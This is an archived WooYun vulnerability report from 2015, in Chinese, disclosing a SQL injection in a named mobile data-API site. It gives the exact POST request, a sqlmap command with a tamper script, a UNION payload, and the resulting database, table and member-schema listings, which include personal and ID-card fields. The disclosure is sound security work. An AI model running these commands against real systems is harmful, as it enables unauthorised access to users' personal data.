乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-04: 细节已通知厂商并且等待厂商处理中 2015-01-04: 厂商已经确认,细节仅向厂商公开 2015-01-14: 细节向核心白帽子及相关领域专家公开 2015-01-24: 细节向普通白帽子公开 2015-02-03: 细节向实习白帽子公开 2015-02-18: 细节向公众公开
聚合数据某系统SQL注射涉及大量信息
站点:http://m.juhe.cn
POST /data/index HTTP/1.1Host: m.juhe.cnAccept: */*Accept-Language: endataname=Peter+Winter&interface_btn=%0d
dataname字段未过滤
sqlmap.py -u "http://m.juhe.cn/data/index" --data="dataname=Peter+Winter&interface_btn=%0d" --tamper="tamper/charencode.py" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: dataname (POST) Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: dataname=Peter Winter') UNION ALL SELECT CONCAT(0x7176767671,0x644e486e6c637559504b,0x71706b7671),NULL#&interface_btn=---web application technology: Apacheback-end DBMS: MySQL 5current user: 'juheuser@%'available databases [6]:[*] information_schema[*] mobile_juhe[*] op.ofpay[*] test[*] ucenter[*] weizhang_weiche
看一看mobile_juhe
Database: mobile_juhe[58 tables]+---------------------+| adm_access_a || adm_access_c || adm_admin || adm_group || adm_group_access || adm_logs || chinajoy_awardlogs || chinajoy_awards || chinajoy_ips || foreign_apis || lottery_award_count || lottery_logs || lottery_user_award || lottery_user_count || lottery_users_fanli || m_account || m_account_pay_logs || m_announcement || m_apiaccount_logs || m_apipay_logs || m_banner || m_bindmail_code || m_category || m_channel || m_channel_report || m_coins_activity || m_coins_exchange || m_data || m_data_api || m_data_delete_logs || m_data_errcode || m_data_package || m_data_price || m_intro_logs || m_login_logs || m_loginad || m_loginerr || m_member || m_message || m_mobilecode || m_news || m_news_category || m_pay_logs || m_paycoin_logs || m_qa || m_qa_answer || m_qa_category || m_qa_tags || m_sq || m_sq_logs || m_user_api || m_user_buylogs || m_user_coin || m_user_coin_logs || m_user_forget || m_user_newbuylogs || m_user_regist_logs || view_data |+---------------------+
瞧一瞧m_member,有9万多条数据
Table: m_member[18 columns]+-------------+------------------+| Column | Type |+-------------+------------------+| channel | varchar(32) || email | varchar(128) || id | int(10) unsigned || lastlogin | datetime || mobileact | tinyint(1) || mobilephone | char(11) || nickname | varchar(64) || openid | char(34) || realname | varchar(64) || regip | varchar(16) || regtime | timestamp || type | int(1) || uid | varchar(64) || vcard | tinyint(1) || vcardimg | varchar(128) || vcardno | varchar(32) || vcardtime | datetime || vcardtips | varchar(64) |+-------------+------------------+
貌似有不少信息,就不再深入了。
见详细说明。
限制。
危害等级:中
漏洞Rank:10
确认时间:2015-01-04 15:33
感谢
暂无